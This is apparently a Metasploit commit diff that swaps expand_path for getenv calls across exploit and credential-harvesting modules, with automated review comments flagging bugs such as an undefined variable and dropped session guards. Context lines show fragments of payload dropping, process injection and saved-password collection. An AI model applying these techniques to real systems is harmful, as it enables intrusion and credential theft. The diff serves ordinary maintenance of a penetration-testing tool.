Land #2782, fix expand_path abuse
commit
d27264b402
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
|
|
@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
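Review bot: The `if session.type == "meterpreter"` line between the two `win_file = file.gsub(...)` lines can only be on the removed side here (the 13-old/11-new counts and the one `end` dropped in the -84,7 +82,6 hunk admit no other assignment), so the `session.fs.file.rm` / `session.shell_command_token` cleanup inside `delete_if` now runs for every session type while the `stdapi` load two lines up is still meterpreter-guarded. On a shell session `session.fs` presumably raises NoMethodError, which the handler ending in `print_error("Failed to delete #{win_file}")` / `false` would report as a failed deletion and keep the file listed; if that fallback is intended, say so with `# non-meterpreter sessions: deletion is skipped, file stays in @dropped_files`, otherwise keep the guard. The three following sections (-74,13 +74,11, -72,13 +72,11 and -66,13 +66,11) make the same restructuring.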
|
|
|
@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.each do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.each do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%WINDIR%")
|
||||
wintemp = session.sys.config.getenv('WINDIR')
|
||||
win_file = "#{wintemp}\\Temp\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
|
|||
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
|
||||
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
|
||||
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Use the system path for executable to run except the wordpad
|
||||
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
|
||||
windir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
windir = client.sys.config.getenv('ProgramFiles')
|
||||
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
|
||||
else # Windows 2000
|
||||
cmd = "notepad.exe"
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Usint this solution atm because I'm experiencing problems with railgun when trying
|
||||
# use GetTokenInformation
|
||||
def low_integrity_level?
|
||||
tmp_dir = expand_path("%TEMP%")
|
||||
tmp_dir = session.sys.config.getenv('TEMP')
|
||||
cd(tmp_dir)
|
||||
new_dir = "#{rand_text_alpha(5)}"
|
||||
begin
|
||||
|
|
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
|
||||
temp_dir = datastore["WritableDir"]
|
||||
else
|
||||
temp_dir = expand_path("%TEMP%")
|
||||
temp_dir = client.sys.config.getenv('TEMP')
|
||||
end
|
||||
|
||||
print_status("Using #{temp_dir} to drop malicious DLL...")
|
||||
|
|
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore["PATH"]
|
||||
payload_path = datastore["PATH"]
|
||||
else
|
||||
payload_path = session.fs.file.expand_path("%TEMP%")
|
||||
payload_path = session.sys.config.getenv('TEMP')
|
||||
end
|
||||
|
||||
cmd_location = "#{payload_path}\\#{payload_filename}"
|
||||
|
|
|
@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check_permissions!
|
||||
# Check if you are an admin
|
||||
vprint_status('Checking admin status...')
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Build a random name for the share and directory
|
||||
share_name = Rex::Text.rand_text_alphanumeric(8)
|
||||
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
drive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||
share_dir = "#{drive}\\#{share_name}"
|
||||
|
||||
# Create them
|
||||
|
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
cmd = datastore["CMD"] || nil
|
||||
upload_fn = nil
|
||||
|
||||
tempdir = session.fs.file.expand_path("%TEMP%")
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
if not cmd
|
||||
# Get the exe payload.
|
||||
exe = generate_payload_exe
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Create a new task to do our bidding, but make sure it doesn't run.
|
||||
#
|
||||
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
sysdir = session.sys.config.getenv('SystemRoot')
|
||||
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
|
||||
|
||||
print_status("Creating task: #{taskname}")
|
||||
|
|
|
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def low_integrity_level?
|
||||
tmp_dir = expand_path("%USERPROFILE%")
|
||||
tmp_dir = session.sys.config.getenv('USERPROFILE')
|
||||
cd(tmp_dir)
|
||||
new_dir = "#{rand_text_alpha(5)}"
|
||||
begin
|
||||
|
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore['TECHNIQUE'] == 'FILE'
|
||||
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
|
||||
begin
|
||||
tmp_dir = expand_path("%TEMP%")
|
||||
tmp_dir = session.sys.config.getenv('TEMP')
|
||||
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
|
||||
cd(tmp_dir)
|
||||
print_status("Trying to drop payload to #{tmp_dir}...")
|
||||
|
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Spawn low integrity cmd.exe
|
||||
print_status("Spawning Low Integrity Cmd Prompt")
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
|
||||
|
||||
count = count_cmd_procs
|
||||
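Review bot: `windir = session.sys.config.getenv('windir')` in the -186,7 +186,7 hunk sits directly above `client.sys.process.execute(...)`, so the same session is addressed as `session` on one line and `client` on the next (the replaced line used `client`); `windir = client.sys.config.getenv('windir')` keeps the block consistent. In the -133,7 +133,7 hunk, `tmp_dir << "\\Low"` now appends in place to the String that `getenv('TEMP')` returned, which is only safe if getenv hands out a fresh String per call — not visible here; `tmp_dir = "#{tmp_dir}\\Low" unless tmp_dir[-3,3] =~ /Low/i` sidesteps the question. The enclosing method of the -133 hunk starts outside it.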
|
|
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def create_proc
|
||||
windir = expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
# run hidden
|
||||
begin
|
||||
|
|
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
print_status("Launching notepad to host the exploit...")
|
||||
|
||||
windir = expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
||||
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
|
||||
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||
|
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||
# Returns process PID
|
||||
def create_temp_proc()
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = client.sys.config.getenv('windir')
|
||||
# Select path of executable to run depending the architecture
|
||||
if @payload_arch.first== "x86" and client.platform =~ /x86/
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
|
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Writes script to target host
|
||||
def write_script_to_target(vbs,name)
|
||||
tempdir = expand_path("%TEMP%")
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
if name == nil
|
||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||
else
|
||||
|
|
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
def check
|
||||
os = sysinfo["OS"]
|
||||
if os =~ /windows/i
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
|
||||
|
||||
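Review bot: `file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"` appends in place to the String `getenv` returns — safe only if that String is freshly allocated per call, which is not visible here — and fails with NoMethodError on nil rather than a readable message if `windir` is unset; `file_path = "#{session.sys.config.getenv('windir')}\\system32\\win32k.sys"` has neither problem. The same `<<` on a getenv result is in `create_pac` (-87,7 +87,7, `getenv("APPDATA") << "\\" << ...`) and in the rpcapd section (-46,7 +46,8, `getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"`). `check` continues outside the hunk.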
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Returns path for XML and payload
|
||||
def generate_path(rexename)
|
||||
# Generate a path to write payload and XML
|
||||
path = datastore['PATH'] || expand_path("%TEMP%")
|
||||
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
|
||||
rexe_path = "#{path}\\#{rexename}"
|
||||
return xml_path,rexe_path
|
||||
|
|
|
@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
|
||||
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||
sysdir = dir_env['SystemRoot']
|
||||
tmpdir = dir_env['TEMP']
|
||||
|
||||
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
|
||||
begin
|
||||
|
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
moved = false
|
||||
configed = false
|
||||
#default path, but there should be an ImagePath registry key
|
||||
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
|
||||
source = "#{sysdir}\\system32\\#{serv}.exe"
|
||||
#get path to exe; parse out quotes and arguments
|
||||
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
||||
sourcemaybe = session.fs.file.expand_path(sourceorig)
|
||||
|
|
|
@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
|
|||
end
|
||||
end
|
||||
|
||||
win_temp = client.fs.file.expand_path("%TEMP%")
|
||||
win_temp = client.sys.config.getenv('TEMP')
|
||||
win_file = "#{win_temp}\\#{payload_exe}"
|
||||
print_status("Attempting to delete #{win_file} ...")
|
||||
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||
|
|
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
begin
|
||||
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
|
||||
windir = client.fs.file.expand_path("%WINDIR%")
|
||||
windir = client.sys.config.getenv('WINDIR')
|
||||
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
|
||||
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
|
||||
cmd = "#{windir}\\system32\\attrib.exe -r " +
|
||||
|
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
windir = session.fs.file.expand_path("%WINDIR%")
|
||||
windir = session.sys.config.getenv('WINDIR')
|
||||
win_file = "#{windir}\\system32\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def exists_exe?(exe)
|
||||
path = expand_path("$PATH")
|
||||
path = session.sys.config.getenv("PATH")
|
||||
if path.nil? or path.empty?
|
||||
return false
|
||||
end
|
||||
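Review bot: `path = session.sys.config.getenv("PATH")` makes `exists_exe?` depend on Meterpreter's stdapi, whereas the replaced `expand_path("$PATH")` looks like the Post mixin helper that also works over a plain shell session; if this module admits shell sessions, `session.sys` raises NoMethodError before the nil/empty check below can help. If Meterpreter-only is intended, a one-line comment (`# meterpreter only: stdapi getenv`) would make that explicit; otherwise branch on `session.type` the way the Thunderbird section of this commit does (`cmd_exec("echo ...")` for shells). The same mixin-to-`session.sys` replacement appears in the Prefetch (-183,7 +183,7) and disk-cluster (-57,8 +57,8) hunks; each module's declared session types are outside what is shown.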
|
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
|
|||
paths = enum_users_unix
|
||||
when /win/
|
||||
@platform = :windows
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
os = session.sys.config.sysinfo['OS']
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
|
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
|
|||
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
|
||||
output = []
|
||||
var_names.delete(nil)
|
||||
var_names.flatten.uniq.sort.each do |v|
|
||||
# Emulate the output of set and env, e.g. VAR=VALUE
|
||||
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
|
||||
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
|
||||
output << "#{k}=#{v}"
|
||||
end
|
||||
@output = output.join("\n")
|
||||
@ltype = "windows.environment"
|
||||
|
|
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
|
|||
def get_ff_and_loot_path
|
||||
@paths = {}
|
||||
check_paths = []
|
||||
drive = expand_path("%SystemDrive%")
|
||||
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
|
||||
|
||||
case @platform
|
||||
|
@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
|
|||
print_error("You need root privileges on this platform for DECRYPT option")
|
||||
return false
|
||||
end
|
||||
tmpdir = expand_path("%TEMP%") + "\\"
|
||||
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
|
||||
tmpdir = env_vars['TEMP'] + "\\"
|
||||
drive = env_vars['SystemDrive']
|
||||
# this way allows for more independent use of meterpreter
|
||||
# payload (32 and 64 bit) and cleaner code
|
||||
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
|
||||
|
@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
return session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
return session.shell_command("whoami").chomp
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
end
|
||||
end
|
||||
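Review bot: `tmpdir = env_vars['TEMP'] + "\\"` raises TypeError if `getenvs` yields nil for an unset `TEMP`, and `drive = env_vars['SystemDrive']` is concatenated the same way on the next lines; the replaced `expand_path` always returned a String, so this is a new failure mode, and whether `getenvs` returns nil, "" or omits the key is not visible here. Guarding before the concatenation keeps the method's existing `false` contract: `if %w[TEMP SystemDrive].any? { |k| env_vars[k].blank? }` / `print_error("TEMP or SystemDrive not set on target")` / `return false`. The chrome section (-285,7 +285,8 and -310,7 +311,7) has the same exposure through `env_vars['SYSTEMDRIVE'].strip` and `env_vars['USERNAME'].strip`. `get_ff_and_loot_path` continues outside the hunk.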
|
|
|
@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
|
|||
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
|
||||
when /win/
|
||||
if session.type =~ /meterpreter/
|
||||
user_profile = session.fs.file.expand_path("%APPDATA%")
|
||||
user_profile = session.sys.config.getenv('APPDATA')
|
||||
else
|
||||
user_profile = cmd_exec("echo %APPDATA%").strip
|
||||
end
|
||||
|
|
|
@ -176,7 +176,7 @@ EOS
|
|||
ring0_code.gsub!('TPTP', [pid].pack('V'))
|
||||
|
||||
# Create the malicious Keyboard Layout file...
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
tmpdir = session.sys.config.getenv('TEMP')
|
||||
fname = "p0wns.boom"
|
||||
dllpath = "#{tmpdir}\\#{fname}"
|
||||
fd = session.fs.file.new(dllpath, 'wb')
|
||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
|
|||
paths = []
|
||||
services = []
|
||||
vuln = ""
|
||||
@temp = session.fs.file.expand_path("%TEMP%")
|
||||
@temp = session.sys.config.getenv('TEMP')
|
||||
|
||||
if init_railgun() == :error
|
||||
return
|
||||
|
|
|
@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
print_status("Searching BulletProof FTP Client installation directory...")
|
||||
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
||||
program_files_x86 = expand_path('%ProgramFiles(X86)%')
|
||||
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
|
||||
program_files = program_files_x86 #x64
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||
program_files = progfilesx86 # x64
|
||||
else
|
||||
program_files = expand_path('%ProgramFiles%') #x86
|
||||
program_files = progfiles_env['ProgramFiles'] # x86
|
||||
end
|
||||
|
||||
session.fs.dir.foreach(program_files) do |dir|
|
||||
if dir =~ /BulletProof FTP Client/
|
||||
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
||||
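Review bot: `progfilesx86 = prog_files_env['ProgramFiles(X86)']` references a name that is never assigned — the hash is `progfiles_env` on the previous line — so this raises NameError on every run; the Steam section (-40,10 +40,12) has the identical typo. The `!~ /%ProgramFiles\(X86\)%/` clause was only meaningful for `expand_path`, which returned the literal `%VAR%` when it could not expand; with `getenvs` an unset variable presumably comes back nil or empty, and `.empty?` on nil would raise on 32-bit hosts. `progfilesx86 = progfiles_env['ProgramFiles(X86)']` and `if progfilesx86.present?` (ActiveSupport's `blank?` is already used elsewhere in this commit) cover both. The enclosing method starts outside the hunk.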
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
|
|||
return
|
||||
end
|
||||
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
case session.platform
|
||||
when /win64/i
|
||||
@progs = drive + '\\Program Files (x86)\\'
|
||||
|
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def whoami
|
||||
return session.fs.file.expand_path("%USERNAME%")
|
||||
return session.sys.config.getenv('USERNAME')
|
||||
end
|
||||
end
|
||||
|
|
|
@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
|
|||
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
|
||||
# the correct program files folder.
|
||||
# We will just use an x64 only defined env variable to check.
|
||||
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
|
||||
progs = expand_path('%ProgramFiles(X86)%') #x64
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||
progs = progfilesx86 # x64
|
||||
else
|
||||
progs = expand_path('%ProgramFiles%') #x86
|
||||
progs = progfiles_env['ProgramFiles'] # x86
|
||||
end
|
||||
path = progs + '\\Steam\\config'
|
||||
|
||||
|
|
|
@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
|
|||
def get_config_files
|
||||
# Determine if TortoiseSVN is installed and parse config files
|
||||
savedpwds = 0
|
||||
user_appdata = session.fs.file.expand_path("%APPDATA%")
|
||||
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
|
||||
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
|
||||
print_status("Checking for configuration files in: #{path}")
|
||||
|
||||
begin
|
||||
|
|
|
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def check_systemroot
|
||||
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
|
||||
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
|
||||
check_other(winpath)
|
||||
end
|
||||
|
||||
|
|
|
@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
|
|||
locations = []
|
||||
|
||||
#Checks
|
||||
locations << {:name => 'UltraVNC',
|
||||
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
|
||||
:pass_variable => 'passwd=',
|
||||
:viewonly_variable => 'passwd2=',
|
||||
:port_variable => 'PortNumber='}
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
|
||||
progfiles_env.each do |k, v|
|
||||
next if v.blank?
|
||||
locations << {:name => 'UltraVNC',
|
||||
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
|
||||
:pass_variable => 'passwd=',
|
||||
:viewonly_variable => 'passwd2=',
|
||||
:port_variable => 'PortNumber='}
|
||||
end
|
||||
|
||||
locations << {:name => 'WinVNC3_HKLM',
|
||||
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',
|
||||
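Review bot: `progfiles_env.each do |k, v|` never uses `k`; if the key is not needed, `progfiles_env.each_value do |v|` says so, and if it is meant to tell the two locations apart, fold it into the entry, `:name => "UltraVNC (#{k})"`, since both pushed hashes are otherwise indistinguishable by `:name`. Whether the consumer of `locations` cares about that is outside the hunk.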
|
|
|
@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def run
|
||||
print_status("Looking for WinSCP.ini file storage...")
|
||||
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
|
||||
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
|
||||
print_status("Looking for Registry Storage...")
|
||||
get_reg()
|
||||
print_status("Done!")
|
||||
|
|
|
@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
|
|||
user = session.sys.config.getuid
|
||||
userpath = nil
|
||||
useroffcpath = nil
|
||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
||||
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||
sysdrv = env_vars['SystemDrive']
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
userpath = sysdrv + "\\Users\\"
|
||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||
|
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
|
|||
userinfo = {}
|
||||
end
|
||||
else
|
||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
||||
uservar = env_vars['USERNAME']
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||
|
|
|
@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
|
|||
host = session.session_host
|
||||
|
||||
#Get Google Chrome user data path
|
||||
sysdrive = expand_path("%SYSTEMDRIVE%").strip
|
||||
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
|
||||
sysdrive = env_vars['SYSTEMDRIVE'].strip
|
||||
if directory?("#{sysdrive}\\Users")
|
||||
@profiles_path = "#{sysdrive}/Users"
|
||||
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
||||
|
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
|
|||
else
|
||||
uid = session.sys.config.getuid
|
||||
print_status "Running as user '#{uid}'..."
|
||||
usernames << expand_path("%USERNAME%").strip
|
||||
usernames << env_vars['USERNAME'].strip
|
||||
end
|
||||
|
||||
